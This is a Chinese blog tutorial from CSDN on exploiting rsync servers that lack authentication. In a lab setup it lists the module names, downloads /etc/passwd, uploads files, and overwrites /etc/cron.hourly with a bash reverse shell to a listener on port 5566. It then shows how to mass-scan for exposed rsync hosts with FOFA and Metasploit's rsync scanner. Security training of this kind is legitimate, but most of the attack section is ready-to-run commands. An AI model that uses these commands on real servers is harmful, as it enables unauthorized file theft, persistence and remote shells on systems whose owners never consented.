应用协议漏洞-Rsync+协议+漏洞批扫

文章详细介绍了服务的概念,以MySQL和rsync为例阐述服务可能存在的安全漏洞。通过案例展示了如何检测及利用rsync未授权访问漏洞,包括文件读写和获取shell。此外,还提到了利用Fofa和Msfconsole进行批量扫描和漏洞验证的方法。
摘要由CSDN通过智能技术生成

什么是服务?

在服务器操作系统安装的时候,会装了比较多的服务。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。这些服务就可能产生漏洞。

服务漏洞测试流程:

协议:

FTP:文件传输协议,默认端口21

RDP:Windows远程桌面协议,默认端口3389

SSH:Linux安全外壳协议,默认端口22

 

案例演示:rsync-common 未授权访问

rsync是什么?

         rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口。

漏洞产生原因:

目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件

使用vulfucos靶场开启漏洞环境

在自己linux服务器输入:rsync rsync://目标ip:端口/  判断漏洞是否存在

如果返回模块名列表等内容,说明漏洞存在

漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/

还可以进行下载和上传操作:

下载文件:rsync rsync://123.58.224.8:58725/src/etc/passwd ./

上传文件:rsync -av passwd rsync://123.58.224.8:58725/src/tmp/passwd

还可以尝试获取shell:

执行命令:rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt  查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务

于是创建一个带有反弹shell命令的文件进行上传,将/etc/cron.hourly文件的内容覆盖

命令:

touch shell

vim shell   写入内容:/bin/bash -i >& /dev/tcp/接收shell的服务器地址/5566 0>&1

chmod +x shell        

上传shell文件覆盖/etc/cron.hourly文件内容

命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly

服务器监听设置的5566端口,等待定时任务执行接收反弹shell

案例演示:批量扫描rsync漏洞---Fofaviewer配合Msf

工具Fofaviewer:

利用强大的互联网搜索引擎FoFa,将众多常用的API封装到简洁的UI中,让网络安全专业人士更容易在目标网站上寻找漏洞。

下载地址:https://github.com/wgpsec/fofa_viewer

Msfconsole:

msfconsole是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。

Centos系统Msf一键安装命令:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall &&chmod755msfinstall &&./msfinstall

java运行工具Fofaviewer,配置fofa账号和key,

输入查询条件(漏洞特征),点击查询即可获取目标

将查询到的目标数据导出保存,将ip保存到另一个rsync.txt文件中

安装好msf,输入命令:msfconsole  展示工具模块

输入命令:

use auxiliary/scanner/rsync/modules_list  进入rsync漏洞扫描模块

show options    查看模块配置方法

set rhosts file:/root/rsync.txt    批量扫描,指定字典

set threads 10    配置线程

show options   再次查看配置情况

模块配置完成,输入命令:run   启动扫描。【+】代表有漏洞,【*】没有

挑选一个验证是否存在漏洞

成功列出模块名列表,漏洞存在

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值